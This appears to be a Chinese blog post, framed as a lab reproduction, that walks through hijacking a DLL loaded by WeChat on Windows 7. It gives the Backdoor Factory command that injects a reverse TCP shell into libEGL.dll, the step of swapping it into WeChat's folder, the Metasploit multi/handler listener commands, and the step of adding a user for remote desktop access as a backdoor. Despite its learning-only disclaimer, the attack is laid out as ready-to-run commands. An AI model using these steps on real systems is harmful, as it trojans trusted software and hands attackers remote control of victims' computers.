微信DLL劫持反弹shell复现

(该文参考网络他人资料,仅为学习,不许用于非法用途)

一、操作环境

  Windows7 :  微信  , Process Explorer(任务管理工具,本实验中用于查找微信程序调用的DLL文件)

  Kali Linux  :  BDF(劫持工具,可用于DLL注入)

  可以互相ping通

二、操作步骤

  Step1:在win7中打开微信和Process Explorer,在Process Explorer中找到微信进程,再找到微信调用的DLL文件,如:libEGL.dll

   Step2:将该文件拷贝到Kali的BDF工具目录下;

   Step3:运行backdoor.py,向libEGL.dll中注入

./backdoor.py -f libEGL.dll -s reverse_shell_tcp_inline -P 6666 -H Kali的IP

 

   Step4:将注入完成的文件拷贝到win7微信的原位置,替换掉原文件,记得先关闭微信;

   Step5:在Kali开启postgresql,运行MSF;

service postgresql start
msfconsole
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/shell_reverse_tcp 
msf5 exploit(multi/handler) > show options
msf5 exploit(multi/handler) > set lhost kali的IP
msf5 exploit(multi/handler) > set lport 6666
msf5 exploit(multi/handler) > run

  Step6:在win7中运行微信;

   Step7:添加用户,在Kali使用rdesktop远程登陆win7。

 至此,便在win7电脑留下后门。 

posted @ 2019-10-10 00:10  远书  阅读(181)  评论(0编辑  收藏